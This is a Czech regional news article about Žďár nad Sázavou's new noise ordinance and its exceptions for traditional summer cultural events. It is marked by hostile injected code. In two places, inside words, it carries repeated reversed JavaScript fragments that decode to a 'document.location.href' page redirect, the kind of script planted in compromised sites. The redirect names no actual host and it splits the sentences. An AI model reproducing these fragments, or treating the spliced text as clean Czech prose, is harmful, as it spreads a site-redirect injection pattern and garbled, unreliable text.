Rainbow page separator

Vyhláška o nočním klidu obsahuje výjimky pro tradiční akce

Středa, 23. června 2021

Hlasování do participativního rozpočtu končí 30. listopadu

Žďár nad Sázavou / Více jak dvě desítky výjimek na konkrétní kulturní aktivity konané od le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošního června do září obsahuje nová místní vyhláška o nočním klidu, která začala platit ve Žďáře. Vyhláška se opírá o zákon, jenž dobu nočního klidu vymezuje od dvaadvacáté hodiny večerní do šesté hodiny ranní, přičemž porušením se lidé i firmy dopouštějí přestupku.
Výjimky z vyhlášky města platí v případech, kdy jde o termíny kulturních akcí pořádaných v různých místech Žďáru, jako jsou například taneční zábavy, koncerty, festivaly, divadelní nebo muzikálová představení, oslavy založení firmy ŽĎAS, případně promítání letního kina. Do vypsaných aktivit přispívajících k udržení lokálních tradic a upevňování vazeb mezi lidmi, u nichž je překročení platné doby hlasitých nočních projevů [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tolerováno, spadají i obvyklé podniky, které se ve Žďáře uskutečňují každým rokem – kupříkladu folkový festival Horácký džbánek, Festival pod Zelenou horou nebo festival současného tance, pohybového divadla a nového cirkusu KoresponDance.